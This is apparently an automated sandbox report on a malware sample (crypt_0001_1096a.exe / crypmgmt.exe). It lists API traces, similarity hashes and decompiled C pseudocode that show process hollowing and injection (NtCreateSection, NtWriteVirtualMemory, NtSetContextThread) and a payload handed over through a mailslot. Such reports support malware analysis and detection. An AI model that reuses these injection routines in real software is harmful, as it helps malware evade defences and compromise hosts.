  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 64002

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:C007415B17DF758F2ED04850F95EE60E
Total matches:36
Initial Analysis Report:Open
Initial sample Analysis ID:64002
Initial sample SHA 256:212D2CE18964D507A6FE50EE7C33E5EC4FC6B44DEDCC9463D5F6E2581E48E4C3
Initial sample name:crypt_0001_1096a.exe

Similar Executed Functions

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
